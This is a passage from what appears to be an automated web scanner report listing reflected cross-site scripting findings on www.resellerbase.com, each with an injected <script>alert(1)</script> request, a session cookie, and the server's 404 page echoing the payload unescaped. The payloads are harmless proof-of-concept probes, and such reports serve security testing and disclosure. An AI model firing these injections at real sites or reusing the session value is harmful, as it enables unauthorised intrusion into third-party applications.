GET /detail/448c5c<script>alert(1)</script>24dfe5f0438/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/448c5c<script>alert(1)</script>24dfe5f0438/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2757. http://www.resellerbase.com/detail/4/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c9a67<script>alert(1)</script>9273bfd1919 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themesc9a67<script>alert(1)</script>9273bfd1919/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themesc9a67<script>alert(1)</script>9273bfd1919/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2758. http://www.resellerbase.com/detail/4/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1ffbf<script>alert(1)</script>6814abc96d3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos1ffbf<script>alert(1)</script>6814abc96d3/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos1ffbf<script>alert(1)</script>6814abc96d3/images/ was not found on this server.</p>
...[SNIP]...

2.2759. http://www.resellerbase.com/detail/4/themes/kosmos/images/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4881b<script>alert(1)</script>1ac25f77f3b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos/images4881b<script>alert(1)</script>1ac25f77f3b/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images4881b<script>alert(1)</script>1ac25f77f3b/ was not found on this server.</p>
...[SNIP]...

2.2760. http://www.resellerbase.com/detail/4/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 78672<script>alert(1)</script>4e884c1ba0b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos/images/?78672<script>alert(1)</script>4e884c1ba0b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images/?78672<script>alert(1)</script>4e884c1ba0b=1 was not found on this server.</p>
...[SNIP]...

2.2761. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 60b99<script>alert(1)</script>634a3f653c7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail60b99<script>alert(1)</script>634a3f653c7/4/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail60b99<script>alert(1)</script>634a3f653c7/4/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2762. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f4e14<script>alert(1)</script>b62c4750e35 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4f4e14<script>alert(1)</script>b62c4750e35/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4f4e14<script>alert(1)</script>b62c4750e35/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2763. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 55a32<script>alert(1)</script>98368c1922e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes55a32<script>alert(1)</script>98368c1922e/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes55a32<script>alert(1)</script>98368c1922e/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2764. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ce22c<script>alert(1)</script>ea031bafa59 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmosce22c<script>alert(1)</script>ea031bafa59/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmosce22c<script>alert(1)</script>ea031bafa59/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2765. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 74522<script>alert(1)</script>387c5f61cc2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos/images74522<script>alert(1)</script>387c5f61cc2/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images74522<script>alert(1)</script>387c5f61cc2/rating/ was not found on this server.</p>
...[SNIP]...

2.2766. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f2295<script>alert(1)</script>34c0e46be82 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos/images/ratingf2295<script>alert(1)</script>34c0e46be82/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images/ratingf2295<script>alert(1)</script>34c0e46be82/ was not found on this server.</p>
...[SNIP]...

2.2767. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 438fa<script>alert(1)</script>732b60a7f51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos/images/rating/?438fa<script>alert(1)</script>732b60a7f51=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images/rating/?438fa<script>alert(1)</script>732b60a7f51=1 was not found on this server.</p>
...[SNIP]...

2.2768. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/4half.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c8c86<script>alert(1)</script>fd6546ccb4a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailc8c86<script>alert(1)</script>fd6546ccb4a/4/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailc8c86<script>alert(1)</script>fd6546ccb4a/4/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2769. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/4half.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9c9a1<script>alert(1)</script>c03738065aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/49c9a1<script>alert(1)</script>c03738065aa/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/49c9a1<script>alert(1)</script>c03738065aa/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2770. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/4half.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 82eea<script>alert(1)</script>e5d7b7f34c6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes82eea<script>alert(1)</script>e5d7b7f34c6/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes82eea<script>alert(1)</script>e5d7b7f34c6/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2771. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/4half.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 707da<script>alert(1)</script>42591a94ed9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos707da<script>alert(1)</script>42591a94ed9/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos707da<script>alert(1)</script>42591a94ed9/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2772. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/4half.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 61006<script>alert(1)</script>152da2cf15e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos/images61006<script>alert(1)</script>152da2cf15e/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images61006<script>alert(1)</script>152da2cf15e/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2773. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/4half.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 2e16b<script>alert(1)</script>ded97fd667d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos/images/rating2e16b<script>alert(1)</script>ded97fd667d/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images/rating2e16b<script>alert(1)</script>ded97fd667d/4half.gif was not found on this server.</p>
...[SNIP]...

2.2774. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/4half.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 30ae7<script>alert(1)</script>d3b841b60e7 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos/images/rating/4half.gif30ae7<script>alert(1)</script>d3b841b60e7 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images/rating/4half.gif30ae7<script>alert(1)</script>d3b841b60e7 was not found on this server.</p>
...[SNIP]...

2.2775. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/4half.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/rating/4half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8c119<script>alert(1)</script>0f6e82a1262 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos/images/rating/4half.gif?8c119<script>alert(1)</script>0f6e82a1262=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

